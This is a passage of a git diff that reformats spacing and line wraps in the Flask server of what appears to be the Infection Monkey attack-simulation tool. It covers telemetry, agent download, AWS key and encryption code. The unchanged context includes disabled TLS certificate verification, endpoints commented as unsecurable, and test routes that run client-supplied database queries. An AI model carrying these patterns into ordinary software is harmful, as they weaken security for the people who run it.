--- a/monkey/monkey_island/cc/resources/log.py
+++ b/monkey/monkey_island/cc/resources/log.py
@@ -33,4 +33,4 @@ class Log(flask_restful.Resource):
log_data = str(telemetry_json["log"])
log_id = LogService.add_log(monkey_id, log_data)
- return mongo.db.log.find_one_or_404({"_id": log_id})
+ return mongo.db.log.find_one_or_404({"_id":log_id})
diff --git a/monkey/monkey_island/cc/resources/monkey.py b/monkey/monkey_island/cc/resources/monkey.py
index 66dbd881a..221268eaa 100644
--- a/monkey/monkey_island/cc/resources/monkey.py
+++ b/monkey/monkey_island/cc/resources/monkey.py
@@ -28,7 +28,7 @@ class Monkey(flask_restful.Resource):
guid = request.args.get("guid")
if guid:
- monkey_json = mongo.db.monkey.find_one_or_404({"guid": guid})
+ monkey_json = mongo.db.monkey.find_one_or_404({"guid":guid})
monkey_json["config"] = ConfigService.decrypt_flat_config(monkey_json["config"])
return monkey_json
@@ -38,7 +38,7 @@ class Monkey(flask_restful.Resource):
@TestTelemStore.store_test_telem
def patch(self, guid):
monkey_json = json.loads(request.data)
- update = {"$set": {"modifytime": datetime.now()}}
+ update = {"$set":{"modifytime":datetime.now()}}
monkey = NodeService.get_monkey_by_guid(guid)
if "keepalive" in monkey_json:
update["$set"]["keepalive"] = dateutil.parser.parse(monkey_json["keepalive"])
@@ -56,7 +56,7 @@ class Monkey(flask_restful.Resource):
ttl = create_monkey_ttl_document(DEFAULT_MONKEY_TTL_EXPIRY_DURATION_IN_SECONDS)
update["$set"]["ttl_ref"] = ttl.id
- return mongo.db.monkey.update({"_id": monkey["_id"]}, update, upsert=False)
+ return mongo.db.monkey.update({"_id":monkey["_id"]}, update, upsert=False)
# Used by monkey. can't secure.
# Called on monkey wakeup to initialize local configuration
@@ -75,7 +75,7 @@ class Monkey(flask_restful.Resource):
ConfigService.save_initial_config_if_needed()
# if new monkey telem, change config according to "new monkeys" config.
- db_monkey = mongo.db.monkey.find_one({"guid": monkey_json["guid"]})
+ db_monkey = mongo.db.monkey.find_one({"guid":monkey_json["guid"]})
# Update monkey configuration
new_config = ConfigService.get_flat_config(False, False)
@@ -89,12 +89,12 @@ class Monkey(flask_restful.Resource):
exploit_telem = [
x
for x in mongo.db.telemetry.find(
- {
- "telem_category": {"$eq": "exploit"},
- "data.result": {"$eq": True},
- "data.machine.ip_addr": {"$in": monkey_json["ip_addresses"]},
- "monkey_guid": {"$eq": parent},
- }
+ {
+ "telem_category":{"$eq":"exploit"},
+ "data.result":{"$eq":True},
+ "data.machine.ip_addr":{"$in":monkey_json["ip_addresses"]},
+ "monkey_guid":{"$eq":parent},
+ }
)
]
if 1 == len(exploit_telem):
@@ -108,11 +108,11 @@ class Monkey(flask_restful.Resource):
exploit_telem = [
x
for x in mongo.db.telemetry.find(
- {
- "telem_category": {"$eq": "exploit"},
- "data.result": {"$eq": True},
- "data.machine.ip_addr": {"$in": monkey_json["ip_addresses"]},
- }
+ {
+ "telem_category":{"$eq":"exploit"},
+ "data.result":{"$eq":True},
+ "data.machine.ip_addr":{"$in":monkey_json["ip_addresses"]},
+ }
)
]
@@ -135,17 +135,17 @@ class Monkey(flask_restful.Resource):
ttl = create_monkey_ttl_document(DEFAULT_MONKEY_TTL_EXPIRY_DURATION_IN_SECONDS)
monkey_json["ttl_ref"] = ttl.id
- mongo.db.monkey.update({"guid": monkey_json["guid"]}, {"$set": monkey_json}, upsert=True)
+ mongo.db.monkey.update({"guid":monkey_json["guid"]}, {"$set":monkey_json}, upsert=True)
# Merge existing scanned node with new monkey
- new_monkey_id = mongo.db.monkey.find_one({"guid": monkey_json["guid"]})["_id"]
+ new_monkey_id = mongo.db.monkey.find_one({"guid":monkey_json["guid"]})["_id"]
if tunnel_host_ip is not None:
NodeService.set_monkey_tunnel(new_monkey_id, tunnel_host_ip)
existing_node = mongo.db.node.find_one(
- {"ip_addresses": {"$in": monkey_json["ip_addresses"]}}
+ {"ip_addresses":{"$in":monkey_json["ip_addresses"]}}
)
if existing_node:
@@ -153,6 +153,6 @@ class Monkey(flask_restful.Resource):
EdgeService.update_all_dst_nodes(old_dst_node_id=node_id, new_dst_node_id=new_monkey_id)
for creds in existing_node["creds"]:
NodeService.add_credentials_to_monkey(new_monkey_id, creds)
- mongo.db.node.remove({"_id": node_id})
+ mongo.db.node.remove({"_id":node_id})
- return {"id": new_monkey_id}
+ return {"id":new_monkey_id}
diff --git a/monkey/monkey_island/cc/resources/monkey_configuration.py b/monkey/monkey_island/cc/resources/monkey_configuration.py
index d4e415e88..a6dd3862c 100644
--- a/monkey/monkey_island/cc/resources/monkey_configuration.py
+++ b/monkey/monkey_island/cc/resources/monkey_configuration.py
@@ -13,8 +13,8 @@ class MonkeyConfiguration(flask_restful.Resource):
@jwt_required
def get(self):
return jsonify(
- schema=ConfigService.get_config_schema(),
- configuration=ConfigService.get_config(False, True),
+ schema=ConfigService.get_config_schema(),
+ configuration=ConfigService.get_config(False, True),
)
@jwt_required
diff --git a/monkey/monkey_island/cc/resources/monkey_control/remote_port_check.py b/monkey/monkey_island/cc/resources/monkey_control/remote_port_check.py
index 06e49b145..306d5b345 100644
--- a/monkey/monkey_island/cc/resources/monkey_control/remote_port_check.py
+++ b/monkey/monkey_island/cc/resources/monkey_control/remote_port_check.py
@@ -9,6 +9,6 @@ class RemotePortCheck(flask_restful.Resource):
# Used by monkey. can't secure.
def get(self, port):
if port and check_tcp_port(request.remote_addr, port):
- return {"status": "port_visible"}
+ return {"status":"port_visible"}
else:
- return {"status": "port_invisible"}
+ return {"status":"port_invisible"}
diff --git a/monkey/monkey_island/cc/resources/monkey_download.py b/monkey/monkey_island/cc/resources/monkey_download.py
index 5620425aa..bb530b2e3 100644
--- a/monkey/monkey_island/cc/resources/monkey_download.py
+++ b/monkey/monkey_island/cc/resources/monkey_download.py
@@ -14,47 +14,47 @@ logger = logging.getLogger(__name__)
MONKEY_DOWNLOADS = [
{
- "type": "linux",
- "machine": "x86_64",
- "filename": "monkey-linux-64",
+ "type":"linux",
+ "machine":"x86_64",
+ "filename":"monkey-linux-64",
},
{
- "type": "linux",
- "machine": "i686",
- "filename": "monkey-linux-32",
+ "type":"linux",
+ "machine":"i686",
+ "filename":"monkey-linux-32",
},
{
- "type": "linux",
- "machine": "i386",
- "filename": "monkey-linux-32",
+ "type":"linux",
+ "machine":"i386",
+ "filename":"monkey-linux-32",
},
{
- "type": "linux",
- "filename": "monkey-linux-64",
+ "type":"linux",
+ "filename":"monkey-linux-64",
},
{
- "type": "windows",
- "machine": "x86",
- "filename": "monkey-windows-32.exe",
+ "type":"windows",
+ "machine":"x86",
+ "filename":"monkey-windows-32.exe",
},
{
- "type": "windows",
- "machine": "amd64",
- "filename": "monkey-windows-64.exe",
+ "type":"windows",
+ "machine":"amd64",
+ "filename":"monkey-windows-64.exe",
},
{
- "type": "windows",
- "machine": "64",
- "filename": "monkey-windows-64.exe",
+ "type":"windows",
+ "machine":"64",
+ "filename":"monkey-windows-64.exe",
},
{
- "type": "windows",
- "machine": "32",
- "filename": "monkey-windows-32.exe",
+ "type":"windows",
+ "machine":"32",
+ "filename":"monkey-windows-32.exe",
},
{
- "type": "windows",
- "filename": "monkey-windows-32.exe",
+ "type":"windows",
+ "filename":"monkey-windows-32.exe",
},
]
@@ -65,9 +65,8 @@ def get_monkey_executable(host_os, machine):
logger.info("Monkey exec found for os: {0} and machine: {1}".format(host_os, machine))
return download
logger.warning(
- "No monkey executables could be found for the host os or machine or both: host_os: {0}, machine: {1}".format(
- host_os, machine
- )
+ "No monkey executables could be found for the host os or machine or both: host_os: {"
+ "0}, machine: {1}".format(host_os, machine)
)
return None
@@ -103,7 +102,8 @@ class MonkeyDownload(flask_restful.Resource):
@staticmethod
def log_executable_hashes():
"""
- Logs all the hashes of the monkey executables for debugging ease (can check what Monkey version you have etc.).
+ Logs all the hashes of the monkey executables for debugging ease (can check what Monkey
+ version you have etc.).
"""
filenames = set([x["filename"] for x in MONKEY_DOWNLOADS])
for filename in filenames:
@@ -112,9 +112,9 @@ class MonkeyDownload(flask_restful.Resource):
with open(filepath, "rb") as monkey_exec_file:
file_contents = monkey_exec_file.read()
logger.debug(
- "{} hashes:\nSHA-256 {}".format(
- filename, hashlib.sha256(file_contents).hexdigest()
- )
+ "{} hashes:\nSHA-256 {}".format(
+ filename, hashlib.sha256(file_contents).hexdigest()
+ )
)
else:
logger.debug("No monkey executable for {}.".format(filepath))
diff --git a/monkey/monkey_island/cc/resources/netmap.py b/monkey/monkey_island/cc/resources/netmap.py
index 1dfa14657..6012a46f6 100644
--- a/monkey/monkey_island/cc/resources/netmap.py
+++ b/monkey/monkey_island/cc/resources/netmap.py
@@ -13,4 +13,4 @@ class NetMap(flask_restful.Resource):
net_nodes = NetNodeService.get_all_net_nodes()
net_edges = NetEdgeService.get_all_net_edges()
- return {"nodes": net_nodes, "edges": net_edges}
+ return {"nodes":net_nodes, "edges":net_edges}
diff --git a/monkey/monkey_island/cc/resources/node_states.py b/monkey/monkey_island/cc/resources/node_states.py
index 073aafffd..31e3ae73c 100644
--- a/monkey/monkey_island/cc/resources/node_states.py
+++ b/monkey/monkey_island/cc/resources/node_states.py
@@ -7,4 +7,4 @@ from monkey_island.cc.services.utils.node_states import NodeStates as NodeStateL
class NodeStates(flask_restful.Resource):
@jwt_required
def get(self):
- return {"node_states": [state.value for state in NodeStateList]}
+ return {"node_states":[state.value for state in NodeStateList]}
diff --git a/monkey/monkey_island/cc/resources/pba_file_upload.py b/monkey/monkey_island/cc/resources/pba_file_upload.py
index 36f138f10..c9c4d1f27 100644
--- a/monkey/monkey_island/cc/resources/pba_file_upload.py
+++ b/monkey/monkey_island/cc/resources/pba_file_upload.py
@@ -90,6 +90,6 @@ class FileUpload(flask_restful.Resource):
file_path = ABS_UPLOAD_PATH.joinpath(filename).absolute()
request_.files["filepond"].save(str(file_path))
ConfigService.set_config_value(
- (PBA_LINUX_FILENAME_PATH if is_linux else PBA_WINDOWS_FILENAME_PATH), filename
+ (PBA_LINUX_FILENAME_PATH if is_linux else PBA_WINDOWS_FILENAME_PATH), filename
)
return filename
diff --git a/monkey/monkey_island/cc/resources/remote_run.py b/monkey/monkey_island/cc/resources/remote_run.py
index 0e6e6df10..e6a4f72b6 100644
--- a/monkey/monkey_island/cc/resources/remote_run.py
+++ b/monkey/monkey_island/cc/resources/remote_run.py
@@ -33,7 +33,7 @@ class RemoteRun(flask_restful.Resource):
action = request.args.get("action")
if action == "list_aws":
is_aws = RemoteRunAwsService.is_running_on_aws()
- resp = {"is_aws": is_aws}
+ resp = {"is_aws":is_aws}
if is_aws:
try:
resp["instances"] = AwsService.get_instances()
@@ -58,4 +58,4 @@ class RemoteRun(flask_restful.Resource):
return jsonify(resp)
# default action
- return make_response({"error": "Invalid action"}, 500)
+ return make_response({"error":"Invalid action"}, 500)
diff --git a/monkey/monkey_island/cc/resources/root.py b/monkey/monkey_island/cc/resources/root.py
index 57d20904a..5b9cec543 100644
--- a/monkey/monkey_island/cc/resources/root.py
+++ b/monkey/monkey_island/cc/resources/root.py
@@ -30,14 +30,14 @@ class Root(flask_restful.Resource):
elif action == "killall":
return jwt_required(InfectionLifecycle.kill_all)()
elif action == "is-up":
- return {"is-up": True}
+ return {"is-up":True}
else:
- return make_response(400, {"error": "unknown action"})
+ return make_response(400, {"error":"unknown action"})
@jwt_required
def get_server_info(self):
return jsonify(
- ip_addresses=local_ip_addresses(),
- mongo=str(mongo.db),
- completed_steps=InfectionLifecycle.get_completed_steps(),
+ ip_addresses=local_ip_addresses(),
+ mongo=str(mongo.db),
+ completed_steps=InfectionLifecycle.get_completed_steps(),
)
diff --git a/monkey/monkey_island/cc/resources/telemetry.py b/monkey/monkey_island/cc/resources/telemetry.py
index 9bf2f7dda..b769a4ad5 100644
--- a/monkey/monkey_island/cc/resources/telemetry.py
+++ b/monkey/monkey_island/cc/resources/telemetry.py
@@ -28,18 +28,18 @@ class Telemetry(flask_restful.Resource):
if "null" == timestamp: # special case to avoid ugly JS code...
timestamp = None
- result = {"timestamp": datetime.now().isoformat()}
+ result = {"timestamp":datetime.now().isoformat()}
find_filter = {}
if monkey_guid:
- find_filter["monkey_guid"] = {"$eq": monkey_guid}
+ find_filter["monkey_guid"] = {"$eq":monkey_guid}
if telem_category:
- find_filter["telem_category"] = {"$eq": telem_category}
+ find_filter["telem_category"] = {"$eq":telem_category}
if timestamp:
- find_filter["timestamp"] = {"$gt": dateutil.parser.parse(timestamp)}
+ find_filter["timestamp"] = {"$gt":dateutil.parser.parse(timestamp)}
result["objects"] = self.telemetry_to_displayed_telemetry(
- mongo.db.telemetry.find(find_filter)
+ mongo.db.telemetry.find(find_filter)
)
return result
@@ -50,8 +50,8 @@ class Telemetry(flask_restful.Resource):
telemetry_json["data"] = json.loads(telemetry_json["data"])
telemetry_json["timestamp"] = datetime.now()
telemetry_json["command_control_channel"] = {
- "src": request.remote_addr,
- "dst": request.host,
+ "src":request.remote_addr,
+ "dst":request.host,
}
# Monkey communicated, so it's alive. Update the TTL.
@@ -63,7 +63,7 @@ class Telemetry(flask_restful.Resource):
process_telemetry(telemetry_json)
telem_id = mongo.db.telemetry.insert(telemetry_json)
- return mongo.db.telemetry.find_one_or_404({"_id": telem_id})
+ return mongo.db.telemetry.find_one_or_404({"_id":telem_id})
@staticmethod
def telemetry_to_displayed_telemetry(telemetry):
diff --git a/monkey/monkey_island/cc/resources/telemetry_feed.py b/monkey/monkey_island/cc/resources/telemetry_feed.py
index 4a2972cdb..6d12d204e 100644
--- a/monkey/monkey_island/cc/resources/telemetry_feed.py
+++ b/monkey/monkey_island/cc/resources/telemetry_feed.py
@@ -24,38 +24,38 @@ class TelemetryFeed(flask_restful.Resource):
telemetries = mongo.db.telemetry.find({})
else:
telemetries = mongo.db.telemetry.find(
- {"timestamp": {"$gt": dateutil.parser.parse(timestamp)}}
+ {"timestamp":{"$gt":dateutil.parser.parse(timestamp)}}
)
telemetries = telemetries.sort([("timestamp", flask_pymongo.ASCENDING)])
try:
return {
- "telemetries": [
+ "telemetries":[
TelemetryFeed.get_displayed_telemetry(telem)
for telem in telemetries
if TelemetryFeed.should_show_brief(telem)
],
- "timestamp": datetime.now().isoformat(),
+ "timestamp":datetime.now().isoformat(),
}
except KeyError as err:
logger.error("Failed parsing telemetries. Error: {0}.".format(err))
- return {"telemetries": [], "timestamp": datetime.now().isoformat()}
+ return {"telemetries":[], "timestamp":datetime.now().isoformat()}
@staticmethod
def get_displayed_telemetry(telem):
monkey = NodeService.get_monkey_by_guid(telem["monkey_guid"])
default_hostname = "GUID-" + telem["monkey_guid"]
return {
- "id": telem["_id"],
- "timestamp": telem["timestamp"].strftime("%d/%m/%Y %H:%M:%S"),
- "hostname": monkey.get("hostname", default_hostname) if monkey else default_hostname,
- "brief": TelemetryFeed.get_telem_brief(telem),
+ "id":telem["_id"],
+ "timestamp":telem["timestamp"].strftime("%d/%m/%Y %H:%M:%S"),
+ "hostname":monkey.get("hostname", default_hostname) if monkey else default_hostname,
+ "brief":TelemetryFeed.get_telem_brief(telem),
}
@staticmethod
def get_telem_brief(telem):
telem_brief_parser = TelemetryFeed.get_telem_brief_parser_by_category(
- telem["telem_category"]
+ telem["telem_category"]
)
return telem_brief_parser(telem)
@@ -116,11 +116,11 @@ class TelemetryFeed(flask_restful.Resource):
TELEM_PROCESS_DICT = {
- TelemCategoryEnum.TUNNEL: TelemetryFeed.get_tunnel_telem_brief,
- TelemCategoryEnum.STATE: TelemetryFeed.get_state_telem_brief,
- TelemCategoryEnum.EXPLOIT: TelemetryFeed.get_exploit_telem_brief,
- TelemCategoryEnum.SCAN: TelemetryFeed.get_scan_telem_brief,
- TelemCategoryEnum.SYSTEM_INFO: TelemetryFeed.get_systeminfo_telem_brief,
- TelemCategoryEnum.TRACE: TelemetryFeed.get_trace_telem_brief,
- TelemCategoryEnum.POST_BREACH: TelemetryFeed.get_post_breach_telem_brief,
+ TelemCategoryEnum.TUNNEL:TelemetryFeed.get_tunnel_telem_brief,
+ TelemCategoryEnum.STATE:TelemetryFeed.get_state_telem_brief,
+ TelemCategoryEnum.EXPLOIT:TelemetryFeed.get_exploit_telem_brief,
+ TelemCategoryEnum.SCAN:TelemetryFeed.get_scan_telem_brief,
+ TelemCategoryEnum.SYSTEM_INFO:TelemetryFeed.get_systeminfo_telem_brief,
+ TelemCategoryEnum.TRACE:TelemetryFeed.get_trace_telem_brief,
+ TelemCategoryEnum.POST_BREACH:TelemetryFeed.get_post_breach_telem_brief,
}
diff --git a/monkey/monkey_island/cc/resources/test/clear_caches.py b/monkey/monkey_island/cc/resources/test/clear_caches.py
index 04c6b31d8..34c1ded0f 100644
--- a/monkey/monkey_island/cc/resources/test/clear_caches.py
+++ b/monkey/monkey_island/cc/resources/test/clear_caches.py
@@ -13,7 +13,8 @@ logger = logging.getLogger(__name__)
class ClearCaches(flask_restful.Resource):
"""
- Used for timing tests - we want to get actual execution time of functions in BlackBox without caching -
+ Used for timing tests - we want to get actual execution time of functions in BlackBox without
+ caching -
so we use this to clear the caches.
:note: DO NOT CALL THIS IN PRODUCTION CODE as this will slow down the user experience.
"""
@@ -33,4 +34,4 @@ class ClearCaches(flask_restful.Resource):
logger.error(NOT_ALL_REPORTS_DELETED)
flask_restful.abort(500, error_info=NOT_ALL_REPORTS_DELETED)
- return {"success": "true"}
+ return {"success":"true"}
diff --git a/monkey/monkey_island/cc/resources/test/log_test.py b/monkey/monkey_island/cc/resources/test/log_test.py
index c6ec50f71..ab81da08e 100644
--- a/monkey/monkey_island/cc/resources/test/log_test.py
+++ b/monkey/monkey_island/cc/resources/test/log_test.py
@@ -12,6 +12,6 @@ class LogTest(flask_restful.Resource):
find_query = json_util.loads(request.args.get("find_query"))
log = mongo.db.log.find_one(find_query)
if not log:
- return {"results": None}
+ return {"results":None}
log_file = database.gridfs.get(log["file_id"])
- return {"results": log_file.read().decode()}
+ return {"results":log_file.read().decode()}
diff --git a/monkey/monkey_island/cc/resources/test/monkey_test.py b/monkey/monkey_island/cc/resources/test/monkey_test.py
index 1122141d2..4d96d9268 100644
--- a/monkey/monkey_island/cc/resources/test/monkey_test.py
+++ b/monkey/monkey_island/cc/resources/test/monkey_test.py
@@ -10,4 +10,4 @@ class MonkeyTest(flask_restful.Resource):
@jwt_required
def get(self, **kw):
find_query = json_util.loads(request.args.get("find_query"))
- return {"results": list(mongo.db.monkey.find(find_query))}
+ return {"results":list(mongo.db.monkey.find(find_query))}
diff --git a/monkey/monkey_island/cc/resources/test/telemetry_test.py b/monkey/monkey_island/cc/resources/test/telemetry_test.py
index 54be08d71..e75e821a5 100644
--- a/monkey/monkey_island/cc/resources/test/telemetry_test.py
+++ b/monkey/monkey_island/cc/resources/test/telemetry_test.py
@@ -10,4 +10,4 @@ class TelemetryTest(flask_restful.Resource):
@jwt_required
def get(self, **kw):
find_query = json_util.loads(request.args.get("find_query"))
- return {"results": list(mongo.db.telemetry.find(find_query))}
+ return {"results":list(mongo.db.telemetry.find(find_query))}
diff --git a/monkey/monkey_island/cc/resources/test/utils/telem_store.py b/monkey/monkey_island/cc/resources/test/utils/telem_store.py
index 5920c8da3..d40d06243 100644
--- a/monkey/monkey_island/cc/resources/test/utils/telem_store.py
+++ b/monkey/monkey_island/cc/resources/test/utils/telem_store.py
@@ -12,13 +12,11 @@ from monkey_island.cc.services.config import ConfigService
TELEM_SAMPLE_DIR = "./telem_sample"
MAX_SAME_CATEGORY_TELEMS = 10000
-
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
class TestTelemStore:
-
TELEMS_EXPORTED = False
@staticmethod
@@ -32,13 +30,13 @@ class TestTelemStore:
endpoint = request.path
name = (
str(request.url_rule)
- .replace("/", "_")
- .replace("<", "_")
- .replace(">", "_")
- .replace(":", "_")
+ .replace("/", "_")
+ .replace("<", "_")
+ .replace(">", "_")
+ .replace(":", "_")
)
TestTelem(
- name=name, method=method, endpoint=endpoint, content=content, time=time
+ name=name, method=method, endpoint=endpoint, content=content, time=time
).save()
return f(*args, **kwargs)
@@ -55,8 +53,9 @@ class TestTelemStore:
mkdir(TELEM_SAMPLE_DIR)
for test_telem in TestTelem.objects():
with open(
- TestTelemStore.get_unique_file_path_for_test_telem(TELEM_SAMPLE_DIR, test_telem),
- "w",
+ TestTelemStore.get_unique_file_path_for_test_telem(TELEM_SAMPLE_DIR,
+ test_telem),
+ "w",
) as file:
file.write(test_telem.to_json(indent=2))
TestTelemStore.TELEMS_EXPORTED = True
@@ -71,7 +70,7 @@ class TestTelemStore:
continue
return potential_filepath
raise Exception(
- f"Too many telemetries of the same category. Max amount {MAX_SAME_CATEGORY_TELEMS}"
+ f"Too many telemetries of the same category. Max amount {MAX_SAME_CATEGORY_TELEMS}"
)
@staticmethod
diff --git a/monkey/monkey_island/cc/resources/version_update.py b/monkey/monkey_island/cc/resources/version_update.py
index 87aa96153..76651487a 100644
--- a/monkey/monkey_island/cc/resources/version_update.py
+++ b/monkey/monkey_island/cc/resources/version_update.py
@@ -18,7 +18,7 @@ class VersionUpdate(flask_restful.Resource):
# even when not authenticated
def get(self):
return {
- "current_version": get_version(),
- "newer_version": VersionUpdateService.get_newer_version(),
- "download_link": VersionUpdateService.get_download_link(),
+ "current_version":get_version(),
+ "newer_version":VersionUpdateService.get_newer_version(),
+ "download_link":VersionUpdateService.get_download_link(),
}
diff --git a/monkey/monkey_island/cc/resources/zero_trust/finding_event.py b/monkey/monkey_island/cc/resources/zero_trust/finding_event.py
index ce99390da..6283bf75a 100644
--- a/monkey/monkey_island/cc/resources/zero_trust/finding_event.py
+++ b/monkey/monkey_island/cc/resources/zero_trust/finding_event.py
@@ -12,7 +12,7 @@ class ZeroTrustFindingEvent(flask_restful.Resource):
@jwt_required
def get(self, finding_id: str):
return {
- "events_json": json.dumps(
- MonkeyZTFindingService.get_events_by_finding(finding_id), default=str
+ "events_json":json.dumps(
+ MonkeyZTFindingService.get_events_by_finding(finding_id), default=str
)
}
diff --git a/monkey/monkey_island/cc/resources/zero_trust/scoutsuite_auth/scoutsuite_auth.py b/monkey/monkey_island/cc/resources/zero_trust/scoutsuite_auth/scoutsuite_auth.py
index 5197b1972..e719cae36 100644
--- a/monkey/monkey_island/cc/resources/zero_trust/scoutsuite_auth/scoutsuite_auth.py
+++ b/monkey/monkey_island/cc/resources/zero_trust/scoutsuite_auth/scoutsuite_auth.py
@@ -17,9 +17,9 @@ class ScoutSuiteAuth(flask_restful.Resource):
def get(self, provider: CloudProviders):
if provider == CloudProviders.AWS.value:
is_setup, message = is_cloud_authentication_setup(provider)
- return {"is_setup": is_setup, "message": message}
+ return {"is_setup":is_setup, "message":message}
else:
- return {"is_setup": False, "message": ""}
+ return {"is_setup":False, "message":""}
@jwt_required
def post(self, provider: CloudProviders):
@@ -28,10 +28,10 @@ class ScoutSuiteAuth(flask_restful.Resource):
if provider == CloudProviders.AWS.value:
try:
set_aws_keys(
- access_key_id=key_info["accessKeyId"],
- secret_access_key=key_info["secretAccessKey"],
- session_token=key_info["sessionToken"],
+ access_key_id=key_info["accessKeyId"],
+ secret_access_key=key_info["secretAccessKey"],
+ session_token=key_info["sessionToken"],
)
except InvalidAWSKeys as e:
error_msg = str(e)
- return {"error_msg": error_msg}
+ return {"error_msg":error_msg}
diff --git a/monkey/monkey_island/cc/resources/zero_trust/zero_trust_report.py b/monkey/monkey_island/cc/resources/zero_trust/zero_trust_report.py
index 8b3ce9419..d8a6cfc64 100644
--- a/monkey/monkey_island/cc/resources/zero_trust/zero_trust_report.py
+++ b/monkey/monkey_island/cc/resources/zero_trust/zero_trust_report.py
@@ -31,7 +31,7 @@ class ZeroTrustReport(flask_restful.Resource):
elif report_data == REPORT_DATA_SCOUTSUITE:
# Raw ScoutSuite data is already solved as json, no need to jsonify
return Response(
- ScoutSuiteRawDataService.get_scoutsuite_data_json(), mimetype="application/json"
+ ScoutSuiteRawDataService.get_scoutsuite_data_json(), mimetype="application/json"
)
flask_restful.abort(http.client.NOT_FOUND)
diff --git a/monkey/monkey_island/cc/server_utils/bootloader_server.py b/monkey/monkey_island/cc/server_utils/bootloader_server.py
index 1532f1a8d..f0908e57b 100644
--- a/monkey/monkey_island/cc/server_utils/bootloader_server.py
+++ b/monkey/monkey_island/cc/server_utils/bootloader_server.py
@@ -27,14 +27,14 @@ class BootloaderHTTPRequestHandler(BaseHTTPRequestHandler):
content_length = int(self.headers["Content-Length"])
post_data = self.rfile.read(content_length).decode()
island_server_path = BootloaderHTTPRequestHandler.get_bootloader_resource_url(
- self.request.getsockname()[0]
+ self.request.getsockname()[0]
)
island_server_path = parse.urljoin(island_server_path, self.path[1:])
# The island server doesn't always have a correct SSL cert installed
# (By default it comes with a self signed one),
# that's why we're not verifying the cert in this request.
r = requests.post(
- url=island_server_path, data=post_data, verify=False, timeout=SHORT_REQUEST_TIMEOUT
+ url=island_server_path, data=post_data, verify=False, timeout=SHORT_REQUEST_TIMEOUT
) # noqa: DUO123
try:
diff --git a/monkey/monkey_island/cc/server_utils/consts.py b/monkey/monkey_island/cc/server_utils/consts.py
index 67c7209eb..b89bf4e18 100644
--- a/monkey/monkey_island/cc/server_utils/consts.py
+++ b/monkey/monkey_island/cc/server_utils/consts.py
@@ -8,11 +8,11 @@ DEFAULT_MONKEY_TTL_EXPIRY_DURATION_IN_SECONDS = 60 * 5
DEFAULT_SERVER_CONFIG_PATH = os.path.join(MONKEY_ISLAND_ABS_PATH, "cc", "server_config.json")
DEFAULT_DEVELOP_SERVER_CONFIG_PATH = os.path.join(
- MONKEY_ISLAND_ABS_PATH, "cc", "server_config.json.develop"
+ MONKEY_ISLAND_ABS_PATH, "cc", "server_config.json.develop"
)
DEFAULT_LOGGER_CONFIG_PATH = os.path.join(
- MONKEY_ISLAND_ABS_PATH, "cc", "island_logger_default_config.json"
+ MONKEY_ISLAND_ABS_PATH, "cc", "island_logger_default_config.json"
)
DEFAULT_DATA_DIR = os.path.join(MONKEY_ISLAND_ABS_PATH, "cc")
diff --git a/monkey/monkey_island/cc/server_utils/encryptor.py b/monkey/monkey_island/cc/server_utils/encryptor.py
index 60ab8ead9..95b206674 100644
--- a/monkey/monkey_island/cc/server_utils/encryptor.py
+++ b/monkey/monkey_island/cc/server_utils/encryptor.py
@@ -34,11 +34,11 @@ class Encryptor:
def _pad(self, message):
return message + (self._BLOCK_SIZE - (len(message) % self._BLOCK_SIZE)) * chr(
- self._BLOCK_SIZE - (len(message) % self._BLOCK_SIZE)
+ self._BLOCK_SIZE - (len(message) % self._BLOCK_SIZE)
)
def _unpad(self, message: str):
- return message[0 : -ord(message[len(message) - 1])]
+ return message[0: -ord(message[len(message) - 1])]
def enc(self, message: str):
cipher_iv = Random.new().read(AES.block_size)
@@ -47,9 +47,9 @@ class Encryptor:
def dec(self, enc_message):
enc_message = base64.b64decode(enc_message)
- cipher_iv = enc_message[0 : AES.block_size]
+ cipher_iv = enc_message[0: AES.block_size]
cipher = AES.new(self._cipher_key, AES.MODE_CBC, cipher_iv)
- return self._unpad(cipher.decrypt(enc_message[AES.block_size :]).decode())
+ return self._unpad(cipher.decrypt(enc_message[AES.block_size:]).decode())
def initialize_encryptor(password_file_dir):
diff --git a/monkey/monkey_island/cc/server_utils/island_logger.py b/monkey/monkey_island/cc/server_utils/island_logger.py
index a32f6505f..45c3ebdda 100644
--- a/monkey/monkey_island/cc/server_utils/island_logger.py
+++ b/monkey/monkey_island/cc/server_utils/island_logger.py
@@ -9,9 +9,9 @@ __author__ = "Maor.Rayzin"
def json_setup_logging(
- default_path=DEFAULT_LOGGER_CONFIG_PATH,
- default_level=logging.INFO,
- env_key="LOG_CFG",
+ default_path=DEFAULT_LOGGER_CONFIG_PATH,
+ default_level=logging.INFO,
+ env_key="LOG_CFG",
):
"""
Setup the logging configuration
diff --git a/monkey/monkey_island/cc/server_utils/test_island_logger.py b/monkey/monkey_island/cc/server_utils/test_island_logger.py
index af58f4b75..caebd31bc 100644
--- a/monkey/monkey_island/cc/server_utils/test_island_logger.py
+++ b/monkey/monkey_island/cc/server_utils/test_island_logger.py
@@ -7,7 +7,7 @@ from monkey_island.cc.server_utils.consts import MONKEY_ISLAND_ABS_PATH
from monkey_island.cc.server_utils.island_logger import json_setup_logging
TEST_LOGGER_CONFIG_PATH = os.path.join(
- MONKEY_ISLAND_ABS_PATH, "cc", "testing", "logger_config.json"
+ MONKEY_ISLAND_ABS_PATH, "cc", "testing", "logger_config.json"
)
diff --git a/monkey/monkey_island/cc/services/attack/attack_config.py b/monkey/monkey_island/cc/services/attack/attack_config.py
index faff5f71b..463753d57 100644
--- a/monkey/monkey_island/cc/services/attack/attack_config.py
+++ b/monkey/monkey_island/cc/services/attack/attack_config.py
@@ -17,7 +17,7 @@ class AttackConfig(object):
@staticmethod
def get_config():
- config = mongo.db.attack.find_one({"name": "newconfig"})["properties"]
+ config = mongo.db.attack.find_one({"name":"newconfig"})["properties"]
return config
@staticmethod
@@ -44,7 +44,7 @@ class AttackConfig(object):
@staticmethod
def update_config(config_json):
- mongo.db.attack.update({"name": "newconfig"}, {"$set": config_json}, upsert=True)
+ mongo.db.attack.update({"name":"newconfig"}, {"$set":config_json}, upsert=True)
return True
@staticmethod
@@ -63,7 +63,8 @@ class AttackConfig(object):
@staticmethod
def set_arrays(attack_techniques, monkey_config, monkey_schema):
"""
- Sets exploiters/scanners/PBAs and other array type fields in monkey's config according to ATT&CK matrix
+ Sets exploiters/scanners/PBAs and other array type fields in monkey's config according to
+ ATT&CK matrix
:param attack_techniques: ATT&CK techniques dict. Format: {'T1110': True, ...}
:param monkey_config: Monkey island's configuration
:param monkey_schema: Monkey configuration schema
@@ -73,17 +74,18 @@ class AttackConfig(object):
